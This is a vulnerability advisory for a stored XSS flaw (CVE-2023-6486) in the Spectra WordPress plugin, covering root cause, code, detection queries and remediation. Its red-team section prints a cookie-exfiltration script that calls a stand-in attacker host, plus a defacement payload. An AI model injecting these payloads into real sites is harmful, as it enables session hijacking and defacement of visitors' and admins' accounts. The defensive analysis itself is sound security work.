CVE-2023-6486
Executive Summary
CVE-2023-6486 is a Stored Cross-Site Scripting (XSS) vulnerability in the Spectra – WordPress Gutenberg Blocks plugin, affecting all versions up to and including 2.10.3. The flaw resides in the Custom CSS metabox, where insufficient input sanitization and output escaping allow authenticated attackers with contributor-level access or higher to inject arbitrary web scripts. These scripts execute whenever a user accesses a page containing the malicious payload. The vulnerability is part of the WordPress ecosystem and is not related to Apache or Nginx.
Given the low EPSS score (0.0%) and no public PoC or exploit code, the immediate exploitation risk is low. However, the potential for privilege escalation and site defacement remains significant for WordPress sites using the vulnerable plugin.

Supply Chain & Package Security
This vulnerability affects a WordPress plugin distributed via the official WordPress plugin repository. No NPM, PyPI, Go, or Ruby packages are involved. The supply chain risk is limited to the plugin update mechanism; users must manually update or rely on the WordPress dashboard.
CVSS Breakdown & Threat Level
- CVSS Score: 6.4 (Medium)
- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low (Contributor-level)
- User Interaction: None
- Scope: Changed (impact on other components)
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
Threat Level: Medium. The requirement for authenticated access reduces the attack surface, but the potential for stored XSS can lead to session hijacking, defacement, or phishing attacks.
Deep Dive & Mechanics
The vulnerability exists in the Custom CSS metabox feature of the Spectra plugin. This metabox allows users to add custom CSS to individual posts or pages. The plugin fails to properly sanitize user input and escape output when rendering the custom CSS in the page source.
Root Cause: The spectra_custom_css meta field is stored without adequate sanitization. When the plugin outputs this CSS in the <style> tag, it does not escape HTML entities or JavaScript event handlers. An attacker can inject a payload like:
</style><script>alert('XSS')</script><style>
This breaks out of the CSS context and executes arbitrary JavaScript.
Attack Flow:
- Attacker with contributor-level access creates or edits a post.
- In the Custom CSS metabox, they inject a malicious script.
- The script is stored in the database.
- When any user (including admins) views the post, the script executes in their browser.
Vulnerable vs. Patched Code
Vulnerable Code (<= 2.10.3):
// In a template or shortcode handler
$custom_css = get_post_meta( $post_id, 'spectra_custom_css', true );
if ( ! empty( $custom_css ) ) {
echo '<style>' . $custom_css . '</style>';
}
Patched Code (Hypothetical):
$custom_css = get_post_meta( $post_id, 'spectra_custom_css', true );
if ( ! empty( $custom_css ) ) {
// Sanitize and escape
$safe_css = wp_strip_all_tags( $custom_css );
echo '<style>' . esc_html( $safe_css ) . '</style>';
}
The patch should use wp_strip_all_tags() to remove HTML/script tags and esc_html() to escape any remaining special characters.
Exploitation & Lab Setup
Red Team
Prerequisites:
- WordPress instance with Spectra plugin <= 2.10.3
- Contributor-level account credentials
Exploitation Steps:
- Log in as a contributor.
- Create a new post or edit an existing one.
- In the Custom CSS metabox, inject the following payload:
</style><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script><style> - Publish or save the post.
- When an admin or other user views the post, the script executes, exfiltrating cookies.
Alternative Payload (Defacement):
</style><script>document.body.innerHTML='<h1>Hacked by Red Team</h1>'</script><style>
Blue Team
Detection:
- Monitor for unusual content in the
spectra_custom_csspost meta field. - Look for posts containing
<script>tags or event handlers in custom CSS. - Use WAF rules to block requests with suspicious CSS content.
Hunting Query (SQL):
SELECT ID, post_title, meta_value
FROM wp_postmeta
WHERE meta_key = 'spectra_custom_css'
AND (meta_value LIKE '%</style>%' OR meta_value LIKE '%<script%');
Prevention:
- Update to a patched version (if available).
- Restrict contributor-level access to trusted users only.
- Implement Content Security Policy (CSP) headers to block inline scripts.
Indicators of Compromise (IOCs)
- File:
/wp-content/plugins/spectra/spectra.php(version <= 2.10.3) - Database Entry:
wp_postmetawithmeta_key = 'spectra_custom_css'containing<script>tags. - Network: Outbound requests to attacker-controlled domains from WordPress admin pages.
- Logs: WordPress debug logs showing
spectra_custom_csswith suspicious content.

Remediation & Mitigation
Immediate Actions:
- Update the plugin to the latest version (if a patch is released).
- Disable the Custom CSS metabox for non-admin users via a custom plugin or code snippet:
remove_meta_box( 'spectra_custom_css', 'post', 'normal' ); - Restrict contributor roles to trusted users only.
Long-term Measures:
- Implement a Web Application Firewall (WAF) with rules to block XSS payloads.
- Enforce Content Security Policy (CSP) headers:
Header set Content-Security-Policy "default-src 'self'; script-src 'self'" - Regularly audit user permissions and plugin versions.
Patch Status: UNKNOWN. Monitor the Spectra plugin repository for updates.
